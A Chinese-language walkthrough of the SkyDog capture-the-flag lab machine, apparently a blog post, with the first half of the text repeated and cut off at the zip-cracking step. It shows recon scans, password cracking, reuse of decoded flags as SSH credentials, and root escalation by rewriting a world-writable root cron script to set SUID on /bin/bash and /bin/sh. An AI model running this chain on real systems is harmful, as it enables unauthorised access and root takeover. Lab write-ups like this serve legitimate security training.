admin管理员组文章数量:1130349
渗透学习 - SkyDog
信息收集
利用nmap信息收集
┌──(root㉿kali)-[~]
└─# nmap -A 10.21.77.165
Starting Nmap 7.95 ( https://nmap ) at 2025-09-11 21:09 EDT
Nmap scan report for 10.21.77.165
Host is up (0.072s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 c8:f7:5b:33:8a:5a:0c:03:bb:6b:af:2d:a9:70:d3:01 (DSA)
| 2048 01:9f:dd:98:ba:be:de:22:4a:48:4b:be:8d:1a:47:f4 (RSA)
| 256 f8:a9:65:a5:7c:50:1d:fd:71:57:92:38:8b:ee:8c:0a (ECDSA)
|_ 256 1d:eb:57:4a:b6:23:66:f0:e7:d5:bb:8d:1e:d7:de:23 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 252 disallowed entries (15 shown)
| /search /sdch /groups /catalogs /catalogues /news /nwshp
| /setnewsprefs? /index.html? /? /?hl=*& /?hl=*&*&gws_rd=ssl
|_/addurl/image? /mail/ /pagead/
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=9/11%OT=22%CT=1%CU=40955%PV=Y%DS=2%DC=T%G=Y%TM=68C372E
OS:D%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10B%TI=Z%CI=I%TS=8)SEQ(SP=1
OS:06%GCD=1%ISR=108%TI=Z%CI=I%TS=8)SEQ(SP=107%GCD=1%ISR=109%TI=Z%CI=I%TS=8)
OS:SEQ(SP=109%GCD=1%ISR=10A%TI=Z%CI=I%TS=8)SEQ(SP=FE%GCD=1%ISR=109%TI=Z%CI=
OS:I%TS=8)OPS(O1=M51DST11NW7%O2=M51DST11NW7%O3=M51DNNT11NW7%O4=M51DST11NW7%
OS:O5=M51DST11NW7%O6=M51DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W
OS:6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M51DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=
OS:O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD
OS:=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0
OS:%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=
OS:G%RIPCK=G%RUCK=G%RUD=G)IE(R=N)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 83.06 ms 10.132.0.1
2 84.35 ms 10.21.77.165
可以看到该靶机只开放了2个端口,22(ssh)和80(web)
咱们先看看web有什么可用的信息
web服务信息收集
我们访问网站后是一张图片
保存到本地,使用exiftool查看图片隐藏信息
┌──(root㉿kali)-[~]
└─# exiftool /home/kali/Desktop/SkyDogCon_CTF.jpg
ExifTool Version Number : 13.10
File Name : SkyDogCon_CTF.jpg
Directory : /home/kali/Desktop
File Size : 85 kB
File Modification Date/Time : 2025:09:11 21:12:02-04:00
File Access Date/Time : 2025:09:11 21:12:02-04:00
File Inode Change Date/Time : 2025:09:11 21:12:02-04:00
File Permissions : -rw-rw-r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 96
Y Resolution : 96
Exif Byte Order : Big-endian (Motorola, MM)
Software : Adobe ImageReady
Pixel Units : 1
Pixels Per Unit X : 11811
Pixels Per Unit Y : 11811
XP Comment : flag{abc40a2d4e023b42bd1ff04891549ae2}
Padding : (Binary data 2060 bytes, use -b option to extract)
Image Width : 900
Image Height : 525
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 900x525
Megapixels : 0.472
拿到第1个flag:flag{abc40a2d4e023b42bd1ff04891549ae2}
目前没有其它线索了,咱们用dirsearch扫扫看看有没有什么好东西
┌──(root㉿kali)-[~]
└─# dirsearch -u 10.21.77.165
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/_10.21.77.165/_25-09-11_21-14-10.txt
Target: http://10.21.77.165/
[21:14:10] Starting:
[21:14:16] 403 - 290B - /.ht_wsr.txt
[21:14:16] 403 - 295B - /.htaccess.sample
[21:14:16] 403 - 293B - /.htaccess.orig
[21:14:16] 403 - 293B - /.htaccess.bak1
[21:14:16] 403 - 294B - /.htaccess_extra
[21:14:16] 403 - 293B - /.htaccess_orig
[21:14:16] 403 - 293B - /.htaccess.save
[21:14:16] 403 - 291B - /.htaccessBAK
[21:14:16] 403 - 291B - /.htaccess_sc
[21:14:16] 403 - 291B - /.htaccessOLD
[21:14:16] 403 - 292B - /.htaccessOLD2
[21:14:16] 403 - 283B - /.htm
[21:14:16] 403 - 284B - /.html
[21:14:16] 403 - 290B - /.httr-oauth
[21:14:16] 403 - 293B - /.htpasswd_test
[21:14:16] 403 - 289B - /.htpasswds
[21:14:17] 403 - 283B - /.php
[21:14:17] 403 - 284B - /.php3
[21:14:52] 200 - 2KB - /robots.txt
[21:14:53] 403 - 293B - /server-status/
[21:14:53] 403 - 292B - /server-status
?!robots.txt还是200!直接访问
拿到第2个flag:flag{cd4f10fcba234f0e8b2f60a490c306e6}
测试URL
robots.txt文件记录了很多目录信息 我们使用Python脚本来解析robots.txt文件,并测试其中定义的每个URL 先放上脚本
import requests
from urllib.parse import urljoin
import argparse
def test_robots_urls(target_url, user_agent="*"):
"""
测试目标网站robots.txt中Disallow和Allow的URL是否可以访问。
只显示可以访问的URL,无法访问的仅统计数量。
Args:
target_url (str): 目标网站的基础URL (e.g., https://example).
user_agent (str): 要测试的User-Agent规则,默认为 '*'。
"""
# 1. 获取robots.txt内容
robots_url = urljoin(target_url, '/robots.txt')
try:
response = requests.get(robots_url, timeout=10)
response.raise_for_status()
except requests.RequestException as e:
print(f"[!] 无法获取robots.txt: {e}")
return
print(f"[+] 成功获取 {robots_url}")
print("=" * 50)
# 2. 解析出所有Disallow和Allow路径
disallowed_paths = []
allowed_paths = []
current_ua = None
for line in response.text.splitlines():
line = line.strip()
if line.lower().startswith('user-agent:'):
current_ua = line.split(':', 1)[1].strip()
elif current_ua == user_agent:
if line.lower().startswith('disallow:'):
path = line.split(':', 1)[1].strip()
if path and not path.startswith('#'):
disallowed_paths.append(path)
elif line.lower().startswith('allow:'):
path = line.split(':', 1)[1].strip()
if path and not path.startswith('#'):
allowed_paths.append(path)
print(f"[+] 为User-Agent '{user_agent}' 找到:")
print(f" - Disallow规则: {len(disallowed_paths)} 个")
print(f" - Allow规则: {len(allowed_paths)} 个")
# 3. 测试所有路径(Disallow + Allow)
session = requests.Session()
accessible_urls = []
blocked_count = 0
not_found_count = 0
other_status_count = 0
error_count = 0
all_paths = disallowed_paths + allowed_paths
for path in all_paths:
test_url = urljoin(target_url, path)
try:
resp = session.get(test_url, timeout=8, allow_redirects=True)
if resp.status_code == 200:
accessible_urls.append(test_url)
elif resp.status_code == 403:
blocked_count += 1
elif resp.status_code == 404:
not_found_count += 1
else:
other_status_count += 1
except requests.RequestException:
error_count += 1
# 4. 输出结果
print("\n[+] 可访问的URL列表:")
for url in accessible_urls:
print(f" - {url}")
print("\n[+] 访问统计:")
print(f" - 可访问: {len(accessible_urls)}")
print(f" - 被禁止 (403): {blocked_count}")
print(f" - 不存在 (404): {not_found_count}")
print(f" - 其他状态码: {other_status_count}")
print(f" - 请求错误: {error_count}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="测试robots.txt中Disallow和Allow的URL访问权限。")
parser.add_argument("url", help="目标网站的基础URL (e.g., https://example)")
parser.add_argument("-a", "--user-agent", default="*", help="要测试的User-Agent规则 (默认: *)")
args = parser.parse_args()
test_robots_urls(args.url, args.user_agent)
开测
┌──(root㉿kali)-[~]
└─# python robotoo.py http://10.21.77.165
[+] 成功获取 http://10.21.77.165/robots.txt
==================================================
[+] 为User-Agent '*' 找到:
- Disallow规则: 252 个
- Allow规则: 47 个
[+] 可访问的URL列表:
- http://10.21.77.165/index.html
- http://10.21.77.165/
- http://10.21.77.165/?hl=*&
- http://10.21.77.165/?hl=*&*&gws_rd=ssl
- http://10.21.77.165/?hl=
- http://10.21.77.165/?hl=*&gws_rd=ssl$
- http://10.21.77.165/?gws_rd=ssl$
- http://10.21.77.165/?pt1=true$
- http://10.21.77.165/Setec/
[+] 访问统计:
- 可访问: 9
- 被禁止 (403): 0
- 不存在 (404): 290
- 其他状态码: 0
- 请求错误: 0
发现一个/Setec目录 访问后是一张图片 咱们再看一下它的元数据
┌──(root㉿kali)-[~]
└─# exiftool /home/kali/Desktop/Setec_Astronomy.jpg
ExifTool Version Number : 13.10
File Name : Setec_Astronomy.jpg
Directory : /home/kali/Desktop
File Size : 171 kB
File Modification Date/Time : 2025:09:11 21:36:40-04:00
File Access Date/Time : 2025:09:11 21:36:40-04:00
File Inode Change Date/Time : 2025:09:11 21:36:40-04:00
File Permissions : -rw-rw-r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : cm
X Resolution : 37
Y Resolution : 37
Profile CMM Type : Linotronic
Profile Version : 2.1.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 1998:02:09 06:49:00
Profile File Signature : acsp
Primary Platform : Microsoft Corporation
CMM Flags : Not Embedded, Independent
Device Manufacturer : Hewlett-Packard
Device Model : sRGB
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Media-Relative Colorimetric
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator : Hewlett-Packard
Profile ID : 0
Profile Copyright : Copyright (c) 1998 Hewlett-Packard Company
Profile Description : sRGB IEC61966-2.1
Media White Point : 0.95045 1 1.08905
Media Black Point : 0 0 0
Red Matrix Column : 0.43607 0.22249 0.01392
Green Matrix Column : 0.38515 0.71687 0.09708
Blue Matrix Column : 0.14307 0.06061 0.7141
Device Mfg Desc : IEC http://www.iec.ch
Device Model Desc : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant : 19.6445 20.3718 16.8089
Viewing Cond Surround : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type : D50
Luminance : 76.03647 80 87.12462
Measurement Observer : CIE 1931
Measurement Backing : 0 0 0
Measurement Geometry : Unknown
Measurement Flare : 0.999%
Measurement Illuminant : D65
Technology : Cathode Ray Tube Display
Red Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Image Width : 1024
Image Height : 768
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 1024x768
Megapixels : 0.786
OK没啥用咱们再看看网站源码
发现另外一个目录Astronomy 直接访问
有刚才那张图片和一个压缩文件 把zip文件下载下来进行解压缩看看 解压文件需要密码 使用fcrackzip工具破解
┌──(root㉿kali)-[/home/kali/Desktop]
└─# unzip Whistler.zip
Archive: Whistler.zip
[Whistler.zip] flag.txt password:
password incorrect--reenter:
password incorrect--reenter:
skipping: flag.txt incorrect password
skipping: QuesttoFindCosmo.txt incorrect password
┌──(root㉿kali)-[~]
└─# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u /home/kali/Desktop/Whistler.zip -v
found file 'flag.txt', (size cp/uc 50/ 38, flags 9, chk 874a)
found file 'QuesttoFindCosmo.txt', (size cp/uc 72/ 61, flags 9, chk 83b5)
PASSWORD FOUND!!!!: pw == yourmother
(老外的神人密码…)
拿到密码后咱们解压文件 拿flag
┌──(root㉿kali)-[/home/kali/Desktop]
└─# unzip Whistler.zip
Archive: Whistler.zip
[Whistler.zip] flag.txt password:
extracting: flag.txt
inflating: QuesttoFindCosmo.txt
┌──(root㉿kali)-[/home/kali/Desktop]
└─# cat flag.txt
flag{1871a3c1da602bf471d3d76cc60cdb9b}
┌──(root㉿kali)-[/home/kali/Desktop]
└─# cat QuesttoFindCosmo.txt
Time to break out those binoculars and start doing some OSINT
拿到第3个flag:flag{1871a3c1da602bf471d3d76cc60cdb9b} 同时拿到提示:OSINT(开放源情报)
OSINT
没什么头绪啊 感觉拿到的信息不够用了 再回去看了一下/Setec/页面的网站源码 发现给了一些提示
NSA-Agent-Abbott NSA特工Abbott 根据一系列的搜索 发现了一部名为Sneakers(通天神偷)的电影 在这个角色的引号下 提到了另一个名叫Whistler的角色 还提到了一个名为Cosmo的角色 参考在页面/Setec/的图像中 该图像包含too many secrets文字 这是电影 Sneakers中Setec Astronomy的字谜 所以需要从电影剧本 相关媒体 尤其是演员James Earl Jones中收集相关信息
老外这脑回路有说法的 不用太纠结 这里直接给结果是/PlayTronics/目录 直接访问
发现一个流量包文件和一个flag.txt文件,把2个文件都下载
拿到第4个flag:flag{c07908a705c22922e6d416e0e1107d99}
wireshark流量分析
使用工具wireshark打开companytraffic.pcap文件进行分析 该文件包含大量到Sound Cloud的HTTPS流量 以及托管相关资产的域的DNS查找 pcap的末尾是一个HTTP请求 用于下载MP3文件 这是从IP 54.239.172.25发送到IP 192.168.2.223的MP3文件 接下来按以下操作保存MP3文件(文件-->导出对象-->HTTP-->保存)
然后就是听力时间 (这是真的难听懂在说什么) 最后结合电影台词 Hi. My Name Is Werner Brandes. My Voice Is My Passport. Verify Me. 这里我们得到了用户名wernerbrandes但是不知道密码
MD5解密
有了用户名 但是没有密码 尝试暴力破解ssh登陆密码也没用 我们再次对前面的信息进行整合 发现我们拿到的flag貌似使用MD5加密 尝试解密前面发现的flag
使用在线工具解密 最后得到4个flag的信息为Welcome Home Bots yourmother leroybrown
GetShell
ssh登陆
用解密出来的信息依次尝试登陆 用户名使用wernerbrandes 最后确定凭证为:wernerbrandes:leroybrown
┌──(root㉿kali)-[~]
└─# ssh wernerbrandes@10.21.77.165
wernerbrandes@10.21.77.165's password:
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic x86_64)
* Documentation: https://help.ubuntu/
System information as of Thu Sep 11 21:08:02 EDT 2025
System load: 0.0 Processes: 122
Usage of /: 7.3% of 17.34GB Users logged in: 0
Memory usage: 4% IP address for eth0: 10.21.77.165
Swap usage: 0%
Graph this data and manage this system at:
https://landscape.canonical/
30 packages can be updated.
21 updates are security updates.
Last login: Fri Oct 30 19:08:28 2015 from 10.0.2.5
wernerbrandes@skydogctf:~$ ls
flag.txt
wernerbrandes@skydogctf:~$ cat flag.txt
flag{82ce8d8f5745ff6849fa7af1473c9b35}wernerbrandes@skydogctf:~$
拿到了第5个flag:flag{82ce8d8f5745ff6849fa7af1473c9b35} MD5解密得到Dr. Gunter Janek
提权
提权信息收集
先使用find命令搜索可写入文件 发现有个/lib/log/sanitizer.py脚本 查看脚本权限以及内容
wernerbrandes@skydogctf:~$ find / -perm -0002 -type f 2>/dev/null | grep -v "/proc/"
/lib/log/sanitizer.py
/sys/kernel/security/apparmor/.access
wernerbrandes@skydogctf:~$ ls -la /lib/log/sanitizer.py
-rwxrwxrwx 1 root root 96 Oct 27 2015 /lib/log/sanitizer.py
脚本属于root用户 主要目的是删除/tmp目录下的所有文件和子目录 猜测该脚本是按定时任务运行 以确保/tmp/目录定时清理
提权到root
因为该脚本拥有root权限 我们更新脚本把/bin/bash和/bin/sh二进制文件设置为SUID位 然后更改脚本如下:
wernerbrandes@skydogctf:~$ vim /lib/log/sanitizer.py
wernerbrandes@skydogctf:~$ cat /lib/log/sanitizer.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
os.system('chmod u+s /bin/bash')
os.system('chmod u+s /bin/sh')
except:
sys.exit()
等待几分钟后 /bin/sh二进制文件 执行权限由x变为s
bash-4.3$ /bin/sh
# pwd
/
# whoami
root
# ls
bin boot dev etc home initrd.img lib lib64 lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz
# cd root
# ls
BlackBox
# cd BlackBox
# ls
flag.txt
# cat flag.txt
flag{b70b205c96270be6ced772112e7dd03f}
Congratulations!! Martin Bishop is a free man once again! Go here to receive your reward.
/CongratulationsYouDidIt#
执行/bin/sh 提权到root权限 拿到最后一个flag:flag{b70b205c96270be6ced772112e7dd03f}
作者留下的彩蛋
是一个电影片段 至此全过程结束
渗透学习 - SkyDog
信息收集
利用nmap信息收集
┌──(root㉿kali)-[~]
└─# nmap -A 10.21.77.165
Starting Nmap 7.95 ( https://nmap ) at 2025-09-11 21:09 EDT
Nmap scan report for 10.21.77.165
Host is up (0.072s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 c8:f7:5b:33:8a:5a:0c:03:bb:6b:af:2d:a9:70:d3:01 (DSA)
| 2048 01:9f:dd:98:ba:be:de:22:4a:48:4b:be:8d:1a:47:f4 (RSA)
| 256 f8:a9:65:a5:7c:50:1d:fd:71:57:92:38:8b:ee:8c:0a (ECDSA)
|_ 256 1d:eb:57:4a:b6:23:66:f0:e7:d5:bb:8d:1e:d7:de:23 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 252 disallowed entries (15 shown)
| /search /sdch /groups /catalogs /catalogues /news /nwshp
| /setnewsprefs? /index.html? /? /?hl=*& /?hl=*&*&gws_rd=ssl
|_/addurl/image? /mail/ /pagead/
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=9/11%OT=22%CT=1%CU=40955%PV=Y%DS=2%DC=T%G=Y%TM=68C372E
OS:D%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10B%TI=Z%CI=I%TS=8)SEQ(SP=1
OS:06%GCD=1%ISR=108%TI=Z%CI=I%TS=8)SEQ(SP=107%GCD=1%ISR=109%TI=Z%CI=I%TS=8)
OS:SEQ(SP=109%GCD=1%ISR=10A%TI=Z%CI=I%TS=8)SEQ(SP=FE%GCD=1%ISR=109%TI=Z%CI=
OS:I%TS=8)OPS(O1=M51DST11NW7%O2=M51DST11NW7%O3=M51DNNT11NW7%O4=M51DST11NW7%
OS:O5=M51DST11NW7%O6=M51DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W
OS:6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M51DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=
OS:O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD
OS:=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0
OS:%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=
OS:G%RIPCK=G%RUCK=G%RUD=G)IE(R=N)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 83.06 ms 10.132.0.1
2 84.35 ms 10.21.77.165
可以看到该靶机只开放了2个端口,22(ssh)和80(web)
咱们先看看web有什么可用的信息
web服务信息收集
我们访问网站后是一张图片
保存到本地,使用exiftool查看图片隐藏信息
┌──(root㉿kali)-[~]
└─# exiftool /home/kali/Desktop/SkyDogCon_CTF.jpg
ExifTool Version Number : 13.10
File Name : SkyDogCon_CTF.jpg
Directory : /home/kali/Desktop
File Size : 85 kB
File Modification Date/Time : 2025:09:11 21:12:02-04:00
File Access Date/Time : 2025:09:11 21:12:02-04:00
File Inode Change Date/Time : 2025:09:11 21:12:02-04:00
File Permissions : -rw-rw-r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 96
Y Resolution : 96
Exif Byte Order : Big-endian (Motorola, MM)
Software : Adobe ImageReady
Pixel Units : 1
Pixels Per Unit X : 11811
Pixels Per Unit Y : 11811
XP Comment : flag{abc40a2d4e023b42bd1ff04891549ae2}
Padding : (Binary data 2060 bytes, use -b option to extract)
Image Width : 900
Image Height : 525
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 900x525
Megapixels : 0.472
拿到第1个flag:flag{abc40a2d4e023b42bd1ff04891549ae2}
目前没有其它线索了,咱们用dirsearch扫扫看看有没有什么好东西
┌──(root㉿kali)-[~]
└─# dirsearch -u 10.21.77.165
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/_10.21.77.165/_25-09-11_21-14-10.txt
Target: http://10.21.77.165/
[21:14:10] Starting:
[21:14:16] 403 - 290B - /.ht_wsr.txt
[21:14:16] 403 - 295B - /.htaccess.sample
[21:14:16] 403 - 293B - /.htaccess.orig
[21:14:16] 403 - 293B - /.htaccess.bak1
[21:14:16] 403 - 294B - /.htaccess_extra
[21:14:16] 403 - 293B - /.htaccess_orig
[21:14:16] 403 - 293B - /.htaccess.save
[21:14:16] 403 - 291B - /.htaccessBAK
[21:14:16] 403 - 291B - /.htaccess_sc
[21:14:16] 403 - 291B - /.htaccessOLD
[21:14:16] 403 - 292B - /.htaccessOLD2
[21:14:16] 403 - 283B - /.htm
[21:14:16] 403 - 284B - /.html
[21:14:16] 403 - 290B - /.httr-oauth
[21:14:16] 403 - 293B - /.htpasswd_test
[21:14:16] 403 - 289B - /.htpasswds
[21:14:17] 403 - 283B - /.php
[21:14:17] 403 - 284B - /.php3
[21:14:52] 200 - 2KB - /robots.txt
[21:14:53] 403 - 293B - /server-status/
[21:14:53] 403 - 292B - /server-status
?!robots.txt还是200!直接访问
拿到第2个flag:flag{cd4f10fcba234f0e8b2f60a490c306e6}
测试URL
robots.txt文件记录了很多目录信息 我们使用Python脚本来解析robots.txt文件,并测试其中定义的每个URL 先放上脚本
import requests
from urllib.parse import urljoin
import argparse
def test_robots_urls(target_url, user_agent="*"):
"""
测试目标网站robots.txt中Disallow和Allow的URL是否可以访问。
只显示可以访问的URL,无法访问的仅统计数量。
Args:
target_url (str): 目标网站的基础URL (e.g., https://example).
user_agent (str): 要测试的User-Agent规则,默认为 '*'。
"""
# 1. 获取robots.txt内容
robots_url = urljoin(target_url, '/robots.txt')
try:
response = requests.get(robots_url, timeout=10)
response.raise_for_status()
except requests.RequestException as e:
print(f"[!] 无法获取robots.txt: {e}")
return
print(f"[+] 成功获取 {robots_url}")
print("=" * 50)
# 2. 解析出所有Disallow和Allow路径
disallowed_paths = []
allowed_paths = []
current_ua = None
for line in response.text.splitlines():
line = line.strip()
if line.lower().startswith('user-agent:'):
current_ua = line.split(':', 1)[1].strip()
elif current_ua == user_agent:
if line.lower().startswith('disallow:'):
path = line.split(':', 1)[1].strip()
if path and not path.startswith('#'):
disallowed_paths.append(path)
elif line.lower().startswith('allow:'):
path = line.split(':', 1)[1].strip()
if path and not path.startswith('#'):
allowed_paths.append(path)
print(f"[+] 为User-Agent '{user_agent}' 找到:")
print(f" - Disallow规则: {len(disallowed_paths)} 个")
print(f" - Allow规则: {len(allowed_paths)} 个")
# 3. 测试所有路径(Disallow + Allow)
session = requests.Session()
accessible_urls = []
blocked_count = 0
not_found_count = 0
other_status_count = 0
error_count = 0
all_paths = disallowed_paths + allowed_paths
for path in all_paths:
test_url = urljoin(target_url, path)
try:
resp = session.get(test_url, timeout=8, allow_redirects=True)
if resp.status_code == 200:
accessible_urls.append(test_url)
elif resp.status_code == 403:
blocked_count += 1
elif resp.status_code == 404:
not_found_count += 1
else:
other_status_count += 1
except requests.RequestException:
error_count += 1
# 4. 输出结果
print("\n[+] 可访问的URL列表:")
for url in accessible_urls:
print(f" - {url}")
print("\n[+] 访问统计:")
print(f" - 可访问: {len(accessible_urls)}")
print(f" - 被禁止 (403): {blocked_count}")
print(f" - 不存在 (404): {not_found_count}")
print(f" - 其他状态码: {other_status_count}")
print(f" - 请求错误: {error_count}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="测试robots.txt中Disallow和Allow的URL访问权限。")
parser.add_argument("url", help="目标网站的基础URL (e.g., https://example)")
parser.add_argument("-a", "--user-agent", default="*", help="要测试的User-Agent规则 (默认: *)")
args = parser.parse_args()
test_robots_urls(args.url, args.user_agent)
开测
┌──(root㉿kali)-[~]
└─# python robotoo.py http://10.21.77.165
[+] 成功获取 http://10.21.77.165/robots.txt
==================================================
[+] 为User-Agent '*' 找到:
- Disallow规则: 252 个
- Allow规则: 47 个
[+] 可访问的URL列表:
- http://10.21.77.165/index.html
- http://10.21.77.165/
- http://10.21.77.165/?hl=*&
- http://10.21.77.165/?hl=*&*&gws_rd=ssl
- http://10.21.77.165/?hl=
- http://10.21.77.165/?hl=*&gws_rd=ssl$
- http://10.21.77.165/?gws_rd=ssl$
- http://10.21.77.165/?pt1=true$
- http://10.21.77.165/Setec/
[+] 访问统计:
- 可访问: 9
- 被禁止 (403): 0
- 不存在 (404): 290
- 其他状态码: 0
- 请求错误: 0
发现一个/Setec目录 访问后是一张图片 咱们再看一下它的元数据
┌──(root㉿kali)-[~]
└─# exiftool /home/kali/Desktop/Setec_Astronomy.jpg
ExifTool Version Number : 13.10
File Name : Setec_Astronomy.jpg
Directory : /home/kali/Desktop
File Size : 171 kB
File Modification Date/Time : 2025:09:11 21:36:40-04:00
File Access Date/Time : 2025:09:11 21:36:40-04:00
File Inode Change Date/Time : 2025:09:11 21:36:40-04:00
File Permissions : -rw-rw-r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : cm
X Resolution : 37
Y Resolution : 37
Profile CMM Type : Linotronic
Profile Version : 2.1.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 1998:02:09 06:49:00
Profile File Signature : acsp
Primary Platform : Microsoft Corporation
CMM Flags : Not Embedded, Independent
Device Manufacturer : Hewlett-Packard
Device Model : sRGB
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Media-Relative Colorimetric
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator : Hewlett-Packard
Profile ID : 0
Profile Copyright : Copyright (c) 1998 Hewlett-Packard Company
Profile Description : sRGB IEC61966-2.1
Media White Point : 0.95045 1 1.08905
Media Black Point : 0 0 0
Red Matrix Column : 0.43607 0.22249 0.01392
Green Matrix Column : 0.38515 0.71687 0.09708
Blue Matrix Column : 0.14307 0.06061 0.7141
Device Mfg Desc : IEC http://www.iec.ch
Device Model Desc : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant : 19.6445 20.3718 16.8089
Viewing Cond Surround : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type : D50
Luminance : 76.03647 80 87.12462
Measurement Observer : CIE 1931
Measurement Backing : 0 0 0
Measurement Geometry : Unknown
Measurement Flare : 0.999%
Measurement Illuminant : D65
Technology : Cathode Ray Tube Display
Red Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Image Width : 1024
Image Height : 768
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 1024x768
Megapixels : 0.786
OK没啥用咱们再看看网站源码
发现另外一个目录Astronomy 直接访问
有刚才那张图片和一个压缩文件 把zip文件下载下来进行解压缩看看 解压文件需要密码 使用fcrackzip工具破解
┌──(root㉿kali)-[/home/kali/Desktop]
└─# unzip Whistler.zip
Archive: Whistler.zip
[Whistler.zip] flag.txt password:
password incorrect--reenter:
password incorrect--reenter:
skipping: flag.txt incorrect password
skipping: QuesttoFindCosmo.txt incorrect password
┌──(root㉿kali)-[~]
└─# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u /home/kali/Desktop/Whistler.zip -v
